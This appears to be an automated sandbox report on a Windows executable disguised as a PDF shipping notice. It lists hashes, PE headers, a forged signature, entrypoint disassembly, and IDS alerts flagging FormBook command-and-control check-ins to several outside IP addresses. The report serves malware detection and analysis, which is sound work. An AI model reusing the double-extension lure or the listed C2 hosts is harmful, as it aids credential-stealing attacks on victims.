Process:	C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.5280837450206026
Encrypted:	false
SSDEEP:	96:GNVdtlevDRZpak7m8llj9myGr0qLjLu3FM:GNVgvckac9my8LjL
MD5:	419FC2EF2A5F8F91499B182A69484E4A
SHA1:	7A4D9A94112A8FEA9067C9B02BF29384141ED15E
SHA-256:	B2ED57A9BB9C772B2F9D21D49EBA91BFD412B3135DAD6EFC05777FAADDA10540
SHA-512:	6A51467436A003C1357B9111D002F87F1A0DB9628C692AD2EA32652F1D12F790271F164B731D81E76665D28A07ED5C31EDEA51A414E4C46B46B074E9962210E4
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.490437985451051
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Arrival Notice, CIA Awb Inv Form.pdf.exe
File size:	214328
MD5:	ff71941571d8930c1125b3931d400d86
SHA1:	0a417bf568a5978777021e433bf4693893facd3e
SHA256:	bf952f1cd44de7bf63c63e502670d3a6a97eca1b5f7fd9981ed0d235351e975f
SHA512:	19ba70c75a615446c3c482d3732b373f85a4622ebc0ef652a7e9b368eb30db1a096d6a4e71cc7c118d7192817c18c6aa84429e6a5e2fadb9e8edad8ed4615528
SSDEEP:	1536:uZVG0Dx+5ddSVTrCH+Gbe99P0ezrHSjetlvrrs2gb16A7OsJ4AdDuZxnRVxekC3S:4G12TrQ4zOC5g7OK4AdD4re3RVa
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.....................................Rich....................PE..L....}.O..........................................@........

File Icon


Icon Hash:	c4ccccccc4cc9391

Static PE Info

General
Entrypoint:	0x401598
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4FE77DAE [Sun Jun 24 20:50:54 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	0866620dbb47fce5dcf62fd73a28087e

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Princeless@Pauperise9.LA, CN=Determinerede, OU=saddles, O=Organozinc1, L=stikordet, S=albueben, C=GN
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	22/11/2021 18:40:02 22/11/2022 18:40:02
Subject Chain	E=Princeless@Pauperise9.LA, CN=Determinerede, OU=saddles, O=Organozinc1, L=stikordet, S=albueben, C=GN
Version:	3
Thumbprint MD5:	7034EF897C224C9C7BDB83E97DFC0132
Thumbprint SHA-1:	EF1AC1E686A6F1DE495F0BFD6280EE73EC06795C
Thumbprint SHA-256:	675A574FC88003464890E2D25C543E3FB3A82739956E09B5D312053E83CDCA9D
Serial:	00

Entrypoint Preview

Instruction
push 0041B55Ch
call 00007F5B809A4985h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ch, ch
cld
aad 89h
xor ecx, dword ptr [ecx]
stosb
dec ebp
mov ch, 79h
aas
pop ss
xchg eax, edx
mov dword ptr [00003B11h], eax
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
cwde
and dword ptr [edi], ebx
add ecx, dword ptr [ebp+75h]
jnc 00007F5B809A49F3h
insb
insd
popad
outsb
imul esi, dword ptr [edi], B1CC0000h
pop ds
add eax, dword ptr [eax]
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
and eax, 2037265Ch
leave
dec eax
push eax
dec ecx
test eax, 234F786Ah
je 00007F5B809A4944h
xor byte ptr [ecx+55AEB60Ah], bh
out D9h, eax
dec esi
cmp byte ptr [edx+ebx*8], 0000002Dh
pop ecx
cmp ecx, dword ptr [eax+3Ah]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jno 00007F5B809A492Eh
add dword ptr [eax], eax
and eax, 0000000Bh
push es
add byte ptr [edx+6Fh], ah
jc 00007F5B809A49F6h
jnc 00007F5B809A4993h
or eax, 41000701h
jc 00007F5B809A49F9h
insb
bound eax, dword ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2a274	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x6638	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x33000	0x1538
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x194	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29880	0x2a000	False	0.45206124442	data	6.79025168082	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x2b000	0xe88	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x6638	0x7000	False	0.391427176339	data	4.79823535625	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
LOCK	0x2ce62	0x57d6	MS Windows icon resource - 6 icons, 48x48, 8 bits/pixel, 32x32, 8 bits/pixel	English	United States
RT_ICON	0x2c71a	0x748	data
RT_ICON	0x2c3b2	0x368	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x2c390	0x22	data
RT_VERSION	0x2c170	0x220	data

Imports

DLL

Import

MSVBVM60.DLL

__vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaCyI2, __vbaAryConstruct2, DllFunctionCall, __vbaVarLateMemSt, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaVarCopy, __vbaFpI4, _CIatan, __vbaStrMove, __vbaUI1Str, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaStrCy, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0400 0x04b0
InternalName	BEGRLIGHED
FileVersion	1.00
CompanyName	Verkada
ProductName	Musalmani7
ProductVersion	1.00
OriginalFilename	BEGRLIGHED.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/24/21-15:09:33.889884	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	1.1.1.1
11/24/21-15:09:52.881081	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49816	80	192.168.11.20	34.102.136.180
11/24/21-15:09:52.881081	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49816	80	192.168.11.20	34.102.136.180
11/24/21-15:09:52.881081	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49816	80	192.168.11.20	34.102.136.180
11/24/21-15:09:53.115042	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49816	34.102.136.180	192.168.11.20
11/24/21-15:10:33.708120	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49818	34.102.136.180	192.168.11.20
11/24/21-15:11:36.580027	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.11.20	35.198.112.85
11/24/21-15:11:36.580027	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.11.20	35.198.112.85
11/24/21-15:11:36.580027	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.11.20	35.198.112.85
11/24/21-15:14:13.467588	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49826	80	192.168.11.20	184.168.98.97
11/24/21-15:14:13.467588	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49826	80	192.168.11.20	184.168.98.97
11/24/21-15:14:13.467588	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49826	80	192.168.11.20	184.168.98.97
11/24/21-15:14:34.005658	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49827	80	192.168.11.20	34.102.136.180
11/24/21-15:14:34.005658	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49827	80	192.168.11.20	34.102.136.180
11/24/21-15:14:34.005658	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49827	80	192.168.11.20	34.102.136.180
11/24/21-15:14:34.176236	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49827	34.102.136.180	192.168.11.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2021 15:07:31.597527027 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:31.597560883 CET	443	49805	142.250.185.110	192.168.11.20
Nov 24, 2021 15:07:31.597742081 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:31.610215902 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:31.610233068 CET	443	49805	142.250.185.110	192.168.11.20
Nov 24, 2021 15:07:31.643487930 CET	443	49805	142.250.185.110	192.168.11.20
Nov 24, 2021 15:07:31.643631935 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:31.643680096 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:31.644188881 CET	443	49805	142.250.185.110	192.168.11.20
Nov 24, 2021 15:07:31.644319057 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:31.789627075 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:31.790343046 CET	443	49805	142.250.185.110	192.168.11.20
Nov 24, 2021 15:07:31.790493965 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:31.793642044 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:31.835985899 CET	443	49805	142.250.185.110	192.168.11.20
Nov 24, 2021 15:07:32.341270924 CET	443	49805	142.250.185.110	192.168.11.20
Nov 24, 2021 15:07:32.341454029 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:32.341507912 CET	443	49805	142.250.185.110	192.168.11.20
Nov 24, 2021 15:07:32.341676950 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:32.341712952 CET	443	49805	142.250.185.110	192.168.11.20
Nov 24, 2021 15:07:32.341818094 CET	443	49805	142.250.185.110	192.168.11.20
Nov 24, 2021 15:07:32.341873884 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:32.342020035 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:32.393760920 CET	49805	443	192.168.11.20	142.250.185.110
Nov 24, 2021 15:07:32.393778086 CET	443	49805	142.250.185.110	192.168.11.20
Nov 24, 2021 15:07:32.436808109 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.436901093 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.437181950 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.437421083 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.437465906 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.477533102 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.477735043 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.478190899 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.478399992 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.481868982 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.481877089 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.482001066 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.482270956 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.482604027 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.523854017 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.687151909 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.687361956 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.687628984 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.687830925 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.688369989 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.688659906 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.690095901 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.690354109 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.690413952 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.690644979 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.692847967 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.693100929 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.695451975 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.695688009 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.697957039 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.698149920 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.698194027 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.698290110 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.698348045 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.698383093 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.698494911 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.698636055 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.698983908 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.699244976 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.699300051 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.699449062 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.699765921 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.699923038 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.699969053 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.700150967 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.700516939 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.700678110 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.700715065 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.700860023 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.701217890 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.701477051 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.701523066 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.701724052 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.701955080 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.702115059 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.702147007 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.702341080 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.702716112 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.702929020 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.702975988 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.703172922 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.703469038 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.703685045 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.703732014 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.703931093 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.704165936 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.704381943 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.704428911 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.704649925 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.704902887 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.705049038 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.705080986 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.705234051 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.705646038 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.705842018 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.705873966 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.706046104 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.706378937 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.706554890 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.706587076 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.706783056 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.707005024 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.707165003 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.707195044 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.707340002 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.707767010 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.707938910 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.707972050 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.708113909 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.708563089 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.708754063 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.708786011 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.709016085 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.709306955 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.709445000 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.709456921 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.709481955 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.709638119 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.710046053 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.710182905 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.710258007 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.710284948 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.710299015 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.710345984 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.710428953 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.710454941 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.710629940 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.710999012 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.711158991 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.711175919 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.711193085 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.711328983 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.711342096 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.711354017 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.711374044 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.711483002 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.711602926 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.712194920 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.712321997 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.712347031 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.712368965 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.712518930 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.712548971 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.712714911 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.713087082 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.713226080 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.713233948 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.713258982 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.713356018 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.713380098 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.713397980 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.713567972 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.714027882 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.714171886 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.714179993 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.714205027 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.714303017 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.714327097 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.714344025 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.714523077 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.714935064 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.715065002 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.715082884 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.715104103 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.715228081 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.715260029 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.715444088 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.715867996 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.716038942 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.716073036 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.716097116 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.716219902 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.716371059 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.716399908 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.716413975 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.716641903 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.716797113 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.716921091 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.716999054 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.717036009 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.717061043 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.717086077 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.717180014 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.717200994 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.717681885 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.717837095 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.717869043 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.717964888 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.718018055 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.718045950 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.718112946 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.718194008 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.718384981 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.718539000 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.718565941 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.718679905 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.718709946 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.718733072 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.718825102 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.718873024 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.719131947 CET	443	49806	142.250.186.97	192.168.11.20
